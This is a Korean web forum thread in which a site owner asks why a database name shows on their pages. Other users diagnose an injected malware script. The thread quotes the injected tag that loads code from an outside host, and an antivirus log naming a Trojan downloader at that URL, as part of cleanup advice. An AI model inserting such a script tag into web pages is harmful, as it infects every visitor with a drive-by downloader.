화면위에 디비네임노출.... 정보
화면위에 디비네임노출....
관련링크
http://yummm.jol.la
131회 연결
본문
이거 왜이러는걸까요 ㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜㅜ
댓글 전체
수정하시면 잘못 건드신듯 보입니다~
크게 변경하시지 않으셨다면
common.php
dbconfig.php ( 덮어쓰기 후 내용 입력 )
/lib/common.lib.php
를 덮어쓰시면 문제 되는 부분이 해결될듯 보입니다.
수정한게 많아 덮어쓰기 하기가 좀 그렇다면
중간에 구문이 잘못 삽입 되보입니다.
소스를 봐야 알수 있을듯 보입니다.
크게 변경하시지 않으셨다면
common.php
dbconfig.php ( 덮어쓰기 후 내용 입력 )
/lib/common.lib.php
를 덮어쓰시면 문제 되는 부분이 해결될듯 보입니다.
수정한게 많아 덮어쓰기 하기가 좀 그렇다면
중간에 구문이 잘못 삽입 되보입니다.
소스를 봐야 알수 있을듯 보입니다.
추가 답변입니다.
악성코드가 삽입되어 있는 보입니다.
파일들 점검해보시기 바랍니다.
악성코드가 삽입되어 있는 보입니다.
파일들 점검해보시기 바랍니다.
헉 어디서 뭘봐야하는지 난감하네요.. 재설치를 하면 괜찬아지려나요..?
dbcontig.php는 어떻게하는것인지 잘모르겟습니다 ㅜㅜㅜ
딱히 그누에서 뭘건드린것은 없는데...
스킨만 가지고했지.. ㅜㅜ 할줄아는게없어서 건드릴수도 없어서요 ㅜㅜ
딱히 그누에서 뭘건드린것은 없는데...
스킨만 가지고했지.. ㅜㅜ 할줄아는게없어서 건드릴수도 없어서요 ㅜㅜ
common.php
/lib/common.lib.php
원본파일에서 이두가지만 덮어쓰기 해보십시오.
그리고 메인에
<script src=http://integratedidea.com/downloads/checkout.php ></script>
로 잡혀있는거
악성코드가 아닐까 생각이 드네요 해당 부분 찾아서 지우시길
/lib/common.lib.php
원본파일에서 이두가지만 덮어쓰기 해보십시오.
그리고 메인에
<script src=http://integratedidea.com/downloads/checkout.php ></script>
로 잡혀있는거
악성코드가 아닐까 생각이 드네요 해당 부분 찾아서 지우시길
메인의 스크립트도지우고 두가지 덮어쓰기도했는데..아직도 노출됩니다 ㅜㅜ
dbconfig.php 파일 확인해보세요
2009-11-10 오후 7:12:10 Detected: Trojan-Downloader.SWF.Agent.bv Internet Explorer http://integratedidea.com/downloads/checkout.php?s=HKcUaat&id=3//Swf2Swc
-------------------------------------
악성코드 삽입되 어 있습니다.
님의 사이트에 접속할경우 접속한 모든 사용자는 악성코드에 노출되며, 유포됩니다.
모든 페이지에서 악성코드가 확인되는결과 아마 글로벌되는 파일에 스크립트 삽입 공격이 있는거 같습니다.
가장좋은방법은 서버 보안프로그램을 업로드후 모두 재설치 하시던지 하셔야합니다.
이대로 장기간 방치시 국가 기관인 KISA나 방통위에서 경고 메일이 올것이며,
구글링에서 사이트 차단시킵니다.
악성코드가 삽입된 루트를 막아야하는데 하나부터 다시 설치하셔야하며, 기본적으로 상위 삽입된 소스가 무엇인지조차 모르신다면, 아마 사용하시는 우동님은 컴퓨터에 악성코드 웹사이트 감지 프로그램이 없으신듯합니다. 사이트 운영자이시라면 운영자의 컴퓨터는 웹서버의 마스터 계정에 직접적으로 접속하기때문에
계정및 비밀번호 FTP DB접속 등이미 모두 노출되셨을겁니다.
모든 계정을 악성코드삭제가 완벽하게된후 비번 을 모두 복잡하게 8자이상 숫자 영문포함 하셔야하며, 보안관련 프로그램을 먼저업로드후 그누보드를 설치하신후 프리웨어로 배포중인
스크립트 삽입금지 프로그램등을 추가적으로 설치하시면 더 좋습니다.
이미 도메인이 악성코드에 노출된이상 해커의 공격이 들어올수도 있습니다.
이점참고하시길 바라며, 부디 해결보시기 바랍니다.
- 악성코드 해커와 전쟁중인 http://co1.kr 무료도메인 사이트 운영자올림 -
-------------------------------------
악성코드 삽입되 어 있습니다.
님의 사이트에 접속할경우 접속한 모든 사용자는 악성코드에 노출되며, 유포됩니다.
모든 페이지에서 악성코드가 확인되는결과 아마 글로벌되는 파일에 스크립트 삽입 공격이 있는거 같습니다.
가장좋은방법은 서버 보안프로그램을 업로드후 모두 재설치 하시던지 하셔야합니다.
이대로 장기간 방치시 국가 기관인 KISA나 방통위에서 경고 메일이 올것이며,
구글링에서 사이트 차단시킵니다.
악성코드가 삽입된 루트를 막아야하는데 하나부터 다시 설치하셔야하며, 기본적으로 상위 삽입된 소스가 무엇인지조차 모르신다면, 아마 사용하시는 우동님은 컴퓨터에 악성코드 웹사이트 감지 프로그램이 없으신듯합니다. 사이트 운영자이시라면 운영자의 컴퓨터는 웹서버의 마스터 계정에 직접적으로 접속하기때문에
계정및 비밀번호 FTP DB접속 등이미 모두 노출되셨을겁니다.
모든 계정을 악성코드삭제가 완벽하게된후 비번 을 모두 복잡하게 8자이상 숫자 영문포함 하셔야하며, 보안관련 프로그램을 먼저업로드후 그누보드를 설치하신후 프리웨어로 배포중인
스크립트 삽입금지 프로그램등을 추가적으로 설치하시면 더 좋습니다.
이미 도메인이 악성코드에 노출된이상 해커의 공격이 들어올수도 있습니다.
이점참고하시길 바라며, 부디 해결보시기 바랍니다.
- 악성코드 해커와 전쟁중인 http://co1.kr 무료도메인 사이트 운영자올림 -